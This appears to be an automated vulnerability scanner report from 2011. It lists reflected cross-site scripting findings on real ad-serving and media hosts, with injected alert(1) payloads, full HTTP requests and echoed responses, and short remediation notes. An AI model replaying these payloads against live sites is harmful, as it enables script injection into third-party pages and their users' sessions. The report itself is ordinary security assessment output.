The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72171"-alert(1)-"9f07e37a40c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014?72171"-alert(1)-"9f07e37a40c HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAADF1FD513A8859D5F71410BF463A8E; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:24 GMT
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc1ae"-alert(1)-"39b95d62acf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5031b"-alert(1)-"8b7f10a80f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c89ac"-alert(1)-"6db55c26a96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a15b"-alert(1)-"00b71c3e276 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d151e"-alert(1)-"833af767b5c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16677"-alert(1)-"52a76ba1058 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb23"-alert(1)-"d03d05de2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68857"-alert(1)-"35970ee03f4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760e5'%3balert(1)//b9ddebd4e1f was submitted in the h parameter. This input was echoed as 760e5';alert(1)//b9ddebd4e1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=75C8C16&w=300&h=250760e5'%3balert(1)//b9ddebd4e1f&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 621
Date: Sun, 02 Oct 2011 22:54:06 GMT
Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf733"%3balert(1)//776e245df9c was submitted in the pid parameter. This input was echoed as cf733";alert(1)//776e245df9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=75C8C16cf733"%3balert(1)//776e245df9c&w=300&h=250&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 621
Date: Sun, 02 Oct 2011 22:54:03 GMT
Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=75C8C16cf733";alert(1)//776e245df9c&rw=1&cm=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000804802%2Fmnum%3D0001075190%2Fcstr%3D35424750%3D_4e88eaf4%2C5017564884%2C804802%5E1075190%5E1184%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fb ...[SNIP]...
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38cb2'%3balert(1)//96f10c267d5 was submitted in the w parameter. This input was echoed as 38cb2';alert(1)//96f10c267d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=75C8C16&w=30038cb2'%3balert(1)//96f10c267d5&h=250&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 621
Date: Sun, 02 Oct 2011 22:54:05 GMT
Connection: close
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 1bf29<script>alert(1)</script>cf97cd26bdb was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5378<script>alert(1)</script>993b4f5c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /se5378<script>alert(1)</script>993b4f5c19/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 02 Oct 2011 23:00:13 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1427
Server: Jetty(6.1.19)
The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 8b9db<script>alert(1)</script>697e3b18685 was submitted in the feed parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips8b9db<script>alert(1)</script>697e3b18685&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:11 GMT
Access-Control-Allow-Origin: *
Content-Type: application/smil; charset=UTF-8
X-Cache: HIT from link.theplatform.com:80
Cache-Control: max-age=5
Connection: close
Server: Jetty(6.1.19)
<smil xmlns="http://www.w3.org/2005/SMIL21/Language"> <head> </head> <body> <seq> <switch> <video src="http://fbchdvod-f.akamaihd.net/z/Fox.com/2/261/fr_the_bridge_final_2500.mp4?hdnea=ip=50.23.123.1 ...[SNIP]... <param name="trackingData" value="b=333060|cc=US|ci=1|cid=1315664|d=1317596411266|l=135082|p=Homepage Player - Network HP Featured Clips8b9db<script>alert(1)</script>697e3b18685|rc=TX|rid=1315779"/> ...[SNIP]...
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload f888e<script>alert(1)</script>32e218dcb1f was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMILf888e<script>alert(1)</script>32e218dcb1f&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request
Date: Sun, 02 Oct 2011 23:00:11 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Connection: close
Server: Jetty(6.1.19)
{ "title": "Unsupported Metafile Format", "description": "'SMILf888e<script>alert(1)</script>32e218dcb1f' is not a supported metafile format.", "isException": true, "exception": "UnsupportedFormat", "responseCode": "400" }
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 2f62d<script>alert(1)</script>a15e2a993fb was submitted in the height parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&format=Script&Tracking=true&Embedded=true&sig=004e88ed2575d1cb75f6e818965b31dad5124cdad97b4f7bca466f784b6579&height=2082f62d<script>alert(1)</script>a15e2a993fb&width=378 HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:09:14 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Content-Type: text/plain; charset=utf-8
Connection: close
Server: Jetty(6.1.19)
{ "title": "Non-numeric Height", "description": "Height value '2082f62d<script>alert(1)</script>a15e2a993fb' is not numeric.", "isException": true, "exception": "NonNumericHeight", "responseCode": "400" }
The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 40ee9<script>alert(1)</script>ad035f486cd was submitted in the width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&format=Script&Tracking=true&Embedded=true&sig=004e88ed2575d1cb75f6e818965b31dad5124cdad97b4f7bca466f784b6579&height=208&width=37840ee9<script>alert(1)</script>ad035f486cd HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:09:15 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Content-Type: text/plain; charset=utf-8
Connection: close
Server: Jetty(6.1.19)
{ "title": "Non-numeric Width", "description": "Width value '37840ee9<script>alert(1)</script>ad035f486cd' is not numeric.", "isException": true, "exception": "NonNumericWidth", "responseCode": "400" }
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aad7e<script>alert(1)</script>13a34c04f95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /saad7e<script>alert(1)</script>13a34c04f95/fox.com/zcBJwfcpENJ_/tracker.log?type=qos&ver=2&d=1317596138497&cc=US&rc=TX&p=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&rid0=1315779&t0=The%20Bridge&tc0=1&lp0=583<0=0&pb0=100&pp0=0.43&pr0=0&nocache=1317596160823 HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 02 Oct 2011 23:01:24 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1440
Server: Jetty(6.1.19)
The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload ab61b<a>6ae5f203bfd was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:42 GMT
Server: Apache/2.2
Content-Length: 563
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:42 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119ab61b<a>6ae5f203bfd&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='1196165203' CNET-PTYPE='10' POS='100' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _ ...[SNIP]...
The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload a7ecb<a>11653f77f27 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:04:45 GMT
Server: Apache/2.2
Content-Length: 468
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:04:45 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1a7ecb<a>11653f77f27&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='17116537727' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw11.cnet.com::1279625536 2011.10. ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 5e057<a>9282d93155d was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:31 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:31 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=575e057<a>9282d93155d&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='200 ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 1cbfb<script>alert(1)</script>8f03840118e was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:10 GMT
Server: Apache/2.2
Content-Length: 1938
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:10 GMT
/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbs-pushdown",segmentId:"1815",rotatorId:"17584",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --><img src=\"http://adlog.com.com/adlog/i/r=17584&sg=1815&o=1%253a&h=cn&p=2&b=571cbfb<script>alert(1)</script>8f03840118e&l=en_US&site=164&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e16:4E88DDCCDFF58&orh=cbs.com&ort=&oepartner=&epartner=&ppartner=&pdom=www. ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd1c6'%3balert(1)//2484adf95d3 was submitted in the BRAND parameter. This input was echoed as fd1c6';alert(1)//2484adf95d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:03 GMT
Server: Apache/2.2
Content-Length: 1121
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:03 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57fd1c6'%3balert(1)//2484adf95d3&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVA ...[SNIP]... <img alt="" height="0" src="http://adlog.com.com/adlog/i/r=17828&sg=1815&o=1%253a&h=cn&p=2&b=57fd1c6';alert(1)//2484adf95d3&l=en_US&site=164&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e17:4E88AD4D3D3DC3&orh=cbs.com&ort=&oepartner=&epartner=&ppartner=&pdom=www ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload c3393*/alert(1)//d130cefde2e was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:05 GMT
Server: Apache/2.2
Content-Length: 1119
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57c3393*/alert(1)//d130cefde2e&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 99188<a>457eb383b9e was submitted in the CELT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:59:49 GMT
Server: Apache/2.2
Content-Length: 511
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Sun, 02 Oct 2011 22:59:49 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js99188<a>457eb383b9e&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" --> ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload 6122c*/alert(1)//2a51957cbdd was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:37 GMT
Server: Apache/2.2
Content-Length: 1132
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:37 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=6122c*/alert(1)//2a51957cbdd&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into the HTML document as plain text between tags. The payload 4f99c<a>f732ff8463b was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:19 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:19 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=4f99c<a>f732ff8463b&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEAC ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 18e97<a>24acc9741b7 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:56 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:56 GMT

